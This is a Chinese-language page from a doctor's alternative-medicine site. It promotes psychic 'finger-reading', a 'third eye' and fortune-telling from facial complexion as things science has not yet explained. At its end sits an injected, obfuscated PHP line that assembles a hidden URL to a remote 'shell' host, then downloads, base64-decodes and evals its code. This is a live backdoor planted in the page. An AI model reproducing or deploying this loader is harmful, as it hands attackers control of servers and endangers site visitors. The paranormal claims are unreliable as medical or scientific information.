收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 對未知事物保持好奇
對未知事物保持好奇 列印 E-mail
        台大校長李嗣涔教授為美國史丹佛大學電機系博士,卻長期致力於研究「特異功能」,並曾開立「手指識字訓練班」,發現十四歲以下兒童經過訓練,約有一成左右能夠突破身體的限制向外擷取訊息,透過手指看到放進盒子裡的字。李教授因此提出「人腦中可能存在第三眼」的假設說。

        佛學中也有所謂「開天眼」,可以感應到某些科學尚無法解釋的信息,而他們感覺到開天眼的位置,恰好正如佛菩薩圖像中眉心圓點的位置,也就是我們所說的印堂。對靈修者來說,這是一個氣場很強的穴道,根據印堂所反應出來的「氣色」,能做為此人禍福吉兇的判斷。

李教授並表示,自古以來流傳下來的許多「傳說」,至今我們看來似乎是怪力亂神或斥為迷信之事,並不代表它們不存在,只是我們不知道、不瞭解而已。所以,我們不能對未知的事情抱持堅決否定的態度,否則人類不會進步。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));